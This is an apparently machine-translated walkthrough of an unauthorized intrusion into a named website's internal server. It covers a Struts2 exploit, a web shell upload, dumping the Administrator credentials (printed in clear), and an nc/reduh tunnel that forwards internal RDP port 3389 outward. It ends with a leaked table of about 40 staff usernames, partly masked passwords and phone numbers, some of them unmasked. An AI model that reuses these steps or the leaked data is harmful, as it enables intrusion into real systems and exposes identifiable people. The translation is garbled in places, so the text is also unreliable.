How can I access a background of the 17WO website and win the Intranet server?

How can I access a background of the 17WO website and win the Intranet server?

Coincidentally, you sent me a text message to the server.

At first, a text message flew over.
 

Mm ~ Access. The Struts2 vulnerability exists at a glance, but it is a pity that the main site does not exist and the second-level domain name is searched.

Then I found this

http://value.17wo.cn/resource/value17wo/LoginForm.action

 

Detected. Mm ~ Such an old hole still exists in struts2 05
 

Upload a sentence directly, and take shell with the kitchen knife.
 

View the ip address. Originally Intranet

Ethernet adapter local Connection 2: Connection-specific DNS Suffix.: IP Address ............: 10.123.177.41 Subnet Mask ...........: zookeeper implements the Default Gateway .........: 10.123.177.35

Then, use getpass.exe to get the Administrator's account and password.

UserName: AdministratorLogonDomain: WINCENTERpassword: wincenter

Lcx.exe failed to forward data. @ Scanf sent me a tool named mongoh, which is good.

The GUI crashes at the beginning, and then uses the jar package for forwarding and the nc for listening.

Upload xx. jsp forwarding File

http://value.17wo.cn/Form/css/xx.jsp

Execute java commands locally

>java -jar reduh.jar http://value.17wo.cn/Form/css/xx.jsp

Enable the nc listening port 1010.

nc -vv localhost 1010

Enter

[createTunnel]1234:127.0.0.1:3389

Forward port 3389 of the Intranet server to port 1010 through port 1234

Input 127.0.0.1: 1234 to connect to mstsc on the local machine.
 

After several days, I was planning to intrude the entire segment. Who knows your server is not powerful. A scan will go down ..

Find a file on the desktop

"ID", "USERNAME", "PASSWORD", "PHONE_NUMBER", "NAME_CHS" "41", "ouyangxp", "oy ****", "186 ** 30233", "1", "mlabs", "Lihan *****", "18 ** 31399", "Li han" "2 ", "wangliang", "wl ***", "", "Wang Liang" "3", "wuyong", "w ***", "1856 ** 0415 ", "Wu Yong" "4", "wenhui", "wh1234", "185 *** 0410", "Wen Hui" "5", "dengrenguang", "drg1234 ", "185 ** 0403", "Deng renguang" "6", "liyiling", "l *****", "1 ** 555083 ", "LI Yiling" "7", "wujie", "w *****", "1852 ** 5098", "Wu Jie" "8", "youjia ", "*****", "1867 ** 75", "youjia" "9", "zhangjunwei", "z *****", "18 ** 4826227", "Zhang junwei" "10", "hepeng", "h *********", "1862 **", "He peng" "11", "zhengwenqing", "z ***", "", "Zheng wenqing" "12", "zy ", "z *** 23 *** 4", "18 *** 0498", "zy" 13 "," zhouqunjie "," z ***** 4 ", "1856 ** 0498", "Zhou qunjie" "14", "lihan", "lh *** 4", "18602 *** 31399 ", "Li han" "15", "fanronghui", "frh ***** 4", "186 ** 30278", "fan ronghui" "16", "kanglisheng ", "k *** 34", "186 *** 40", "Kang Lisheng" "17", "caibingfeng", "cb *****", "1316 ** 0646", "Cai bingfeng" "18", "luojianxiong", "l ****** 4", "18666 ** 048 ", "Luo Jianxiong" "19", "chenfangling", "c *** 23 ** 4", "1862 *** 49", "Chen fangling" "20 ", "demo", "un *****", "", "" 21 "," jiangtao "," * jt ***** "," 18602031756 ", "Jiang Tao" "22", "caizhaochun", "c *****", "", "Cai zhaochun" "23", "liuzhengbiao ", "lz *****", "", "Liu zhengbiao" "24", "wangshuai", "ws ****","", "Wang Shuai" "25", "xuzhongbin", "x *****", "", "Xu zhongbin" "26", "zhengsi ", "zs1 *** 4", "", "Zheng Si" "27", "longzhiyong", "lz *** 234 ","", "Long Zhiyong" "28", "hexin", "hx ***** 4", "", "He Xin" "29", "cuidongping", "cdp1234 ", "", "Cui Dongping" "30", "linmin", "l ***** 4", "", "Lin min" "31", "weierxi ", "w ******* 34", "", "Welch" "32", "wangguanghao", "w ***** 4 ", "", "Wang guanghao" "33", "lihaiqi", "l *****", "", "Li haiqi" "34", "zouwenbin ", "zw ***** 4", "", "Yan Wenbin" "35", "liudexiang", "******** 4 ","", "Liu dexiang" "36", "xuwei", "******* 4", "", "Xu Wei" "37", "wuhaixi ", "w *********", "," Wu haixi "" 38 "," chenchaowei "," cc *****","", "Chen chaowei" "39", "sumaojin", "sm ****** 4", "15 ****** 1728", "" 40 ", "fengyongxiong", "f ***** 34", "1860 ******** 81 ",""

That's all you know.

Solution:

Upgrade